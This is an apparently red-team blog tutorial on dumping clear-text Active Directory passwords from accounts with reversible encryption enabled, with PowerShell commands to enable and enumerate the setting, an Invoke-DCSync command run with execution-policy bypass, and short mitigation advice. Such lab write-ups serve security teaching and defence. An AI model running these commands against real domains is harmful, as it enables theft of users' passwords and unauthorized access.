Credential Dumping – Active Directory Reversible Encryption
Credential Dumping – Active Directory Reversible Encryption is a technique that attackers commonly use to extract user credentials from Windows systems. According to MITRE, adversaries often exploit Active Directory authentication encryption properties to retrieve stored passwords. The AllowReversiblePasswordEncryption property controls whether the system stores passwords using reversible encryption. By default, Windows disables this setting to prevent storing credentials in a retrievable format, unlike secure one-way hashing functions. However, when legacy software or specific applications require it, administrators may enable the setting—thereby exposing the system to significant risk.
- MITRE TACTIC: Credential Dumping (ID: TA0006)
- MITRE Technique Modify Authentication Process (T1556)
- MITRE SUB ID: Reversible Encryption (T1556.005)
Moreover, in the Domain Controller, the system enables reversible encryption for user accounts, which means attackers can reverse the encrypted data to retrieve the user’s password. Since this method does not store the password as a hash, a function can be executed to retrieve the original clear-text password.
Do you know?
As per Microsoft: If you use the Challenge Handshake Authentication Protocol (CHAP) through remote access or Internet Authentication Services (IAS), you must enable this policy setting. CHAP is an authentication protocol that is used by remote access and network connections. Similarly, Digest Authentication in Internet Information Services (IIS) also requires this policy setting to be enabled.
Table of Content
- Lab Setup
- DC-Sync Attack-Dump Plain text Password
- Mitigation
- Conclusion
Lab Setup
Enabling Reversible encryption in Active Directory Users
There are multiple methods to enable Reversible encryption property:
- User Account Property
Enable the Reversible encryption by modifying the account property for the Domain User account.
Powershell Command
set-ADUser – AllowReversiblePasswordEncryption $true
Group Policy Management
Enable the store password using reversible encryption with Computer Configuration\Windows Settings\Security Settings\Account Policies\Password Policy\
Validate the property through User’s property-Attribute Editor for UserAccountControl.
NOTE: Now, if a system administrator resets the password for a user account, an adversary can potentially obtain the plaintext of passwords that they create or change after enabling this property.
Enumeration
PowerShell Command to find user enabled with allow reversible password encryption.
Get-ADUser -Filter {AllowReversiblePasswordEncryption -eq "true"} | Select Name, sAMAccountName
Attack: DC-Sync
In our Previous article, we described the DCsync attack, read more from here. You can download the DC Sync Script tool here.
Commands to execute in the domain controller to check the user’s clear text password.
powershell.exe -ep bypass Import-Module .\Invoke-DCSync.ps1 Invoke-DCSync -AllData
DCSync shows the clear-text password of the target user.
Mitigation
- Additionally, ensure that the Allow Reversible Password Encryption property remains disabled for better security.
- Moreover, set the group policy to store passwords without using reversible encryption to reduce the risk of unauthorized access.
Conclusion
In this article, we were able to decrypt the password of active directory user accounts. This article can serve as a reference for Red Team activists for Credential Dumping – Active Directory Plain Text Password.
Author: Faisal Khan security analyst and expert in infrastructure Security Contact him on LinkedIn
